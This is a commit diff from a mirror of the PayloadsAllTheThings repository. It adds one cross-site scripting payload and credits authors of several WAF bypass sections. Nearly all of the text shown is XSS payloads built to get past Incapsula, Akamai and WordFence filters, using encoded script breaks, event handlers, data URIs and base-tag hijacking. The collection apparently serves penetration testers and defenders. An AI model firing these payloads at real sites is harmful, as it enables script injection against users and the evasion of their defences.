mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Credit fix - WAF bypass
parent
1b2ee3e67a
commit
ddfdc51e68
2 changed files with 5 additions and 4 deletions
|
@ -512,6 +512,7 @@ perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
|
||||||
<IMG SRC='vbscript:msgbox("XSS")'>
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||||
<IMG SRC="livescript:[code]">
|
<IMG SRC="livescript:[code]">
|
||||||
<BODY ONLOAD=alert('XSS')>
|
<BODY ONLOAD=alert('XSS')>
|
||||||
|
xss"><!--><svg/onload=alert(document.domain)>
|
||||||
<BGSOUND SRC="javascript:alert('XSS');">
|
<BGSOUND SRC="javascript:alert('XSS');">
|
||||||
<BR SIZE="&{alert('XSS')}">
|
<BR SIZE="&{alert('XSS')}">
|
||||||
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||||
|
|
|
@ -769,7 +769,7 @@ Works for CSP like `script-src self`
|
||||||
|
|
||||||
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
|
||||||
|
|
||||||
### Incapsula WAF Bypass - 8th march
|
### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||||
|
@ -777,13 +777,13 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
|
||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||||
```
|
```
|
||||||
|
|
||||||
### Incapsula WAF Bypass - 11th september
|
### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Akamai WAF Bypass by @zseano - 18th june
|
### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
||||||
|
@ -795,7 +795,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
|
||||||
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
|
||||||
```
|
```
|
||||||
|
|
||||||
### WordFence WAF Bypass by @brutelogic - 12th september
|
### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
<a href=javascript:alert(1)>
|
<a href=javascript:alert(1)>
|
||||||
|
|